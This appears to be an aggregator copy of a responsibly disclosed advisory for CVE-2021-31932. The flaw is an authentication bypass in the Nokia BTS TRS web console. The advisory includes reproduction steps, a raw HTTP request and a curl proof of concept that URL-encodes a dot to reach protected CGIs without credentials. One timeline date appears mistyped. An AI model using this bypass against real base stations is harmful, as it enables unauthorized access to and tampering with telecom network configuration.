Nokia Transport Module Authentication Bypass Vulnerability

🗓️ 11 Feb 2022 00:00:00Reported by Cristiano MarutiType

zdt🔗 0day.today👁 318 Views

Nokia Transport Module Authentication Bypass Vulnerability in BTS TRS web console - Critical severity, CVE-2021-3193

Reporter	Title	Published	Views	Family All 9
CNNVD	Nokia BTS TRS web console 安全漏洞	11 Feb 202200:00	–	cnnvd
Check Point Advisories	Nokia BTS TRS Web Console Authentication Bypass (CVE-2021-31932)	30 Aug 202200:00	–	checkpoint_advisories
CVE	CVE-2021-31932	11 Feb 202217:37	–	cve
Cvelist	CVE-2021-31932	11 Feb 202217:37	–	cvelist
EUVD	EUVD-2021-18805	7 Oct 202500:30	–	euvd
NVD	CVE-2021-31932	11 Feb 202218:15	–	nvd
Packet Storm	Nokia Transport Module Authentication Bypass	11 Feb 202200:00	–	packetstorm
Prion	Authentication flaw	11 Feb 202218:15	–	prion
RedhatCVE	CVE-2021-31932	22 May 202520:53	–	redhatcve

title: Nokia Transport Module Authentication Bypass
                case id: CM-2020-02
                product: BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)
     vulnerability type: Authentication Bypass
               severity: Critical
                  found: 2020-09-28
   CVE: CVE-2021-31932
                     by: Cristiano Maruti (@cmaruti)

[EXECUTIVE SUMMARY]

 The TRS web console allows an authenticated user to remotely manage the BTS
 and its configuration. The analysis discovered an authentication bypass
 vulnerability (CWE-289) in the web management console. A malicious
 unauthenticated user can get access to all the functionalities exposed via
 the web panel circumventing the authentication process. The vulnerability
 lies in the way the web server in use (lighttpd) protects restricted
 resources and how special characters are encoded and pass to the underline
 CGIs. A successful attack can read data from the BTS and read, modify or
 delete BTS configuration.

[VULNERABLE VERSIONS]

 The following version of the TRS web console was affected by the
 vulnerability; previous versions may be vulnerable as well:
 - BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)

[TECHNICAL DETAILS]

It is possible to reproduce the vulnerability following these steps:
1. Open a web browser and insert the BTS TRS web console IP
2. Navigate to a protected resource (for example
/protected/ShowErrorLog.cgi)
3. Subsitute the dot character with the corresponding URL encoded value
(%2e)
4. Resulting URL
(/protected/ShowErrorLog%2ecgi?token=thisIsNotTheRightToken)
   give access without prompt for any authentication credential

Below a full transcript of the HTTP request used to get access to a
protected
resource.

HTTP Request
-------------------------------------------------------------------------------
GET /protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken HTTP/1.1
Host: <targetip>
User-Agent: curl/7.67.0
Accept: */*

-------------------------------------------------------------------------------
cURL PoC
-------------------------------------------------------------------------------
# curl -vk https://<targetip>/protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken&frame=showLogFile


[VULNERABILITY REFERENCE]
Mitre assigned the following CVE ID to the vulnerability: CVE-2021-31932

[DISCLOSURE TIMELINE]
2020-10-06: Contacting Nokia PSIRT and shared the details of the
vulnerability
2020-10-07: Nokia PSIRT acknowledge the receipt of the message.
2021-10-12: Vendor engineering team confirmed the vulnerability and working
on patch (estimated time end of 2020).
2021-04-30: Research requested a CVE assignment through MITRE CVE
Assignment Team; allocated CVE-2021-31932
2021-05-01: Researcher notified the assigned CVE number to the Vendor
2022-02-08: Researcher asked for permission to publicly release the report
to the public; Nokia PSIRT acknowledged
2022-02-10: Public release


-- 

Cristiano Maruti
about.me/cmaruti

11 Feb 2022 00:00Current

0.3Low risk

Vulners AI Score0.3

CVSS 27.5

CVSS 3.19.8

EPSS0.07281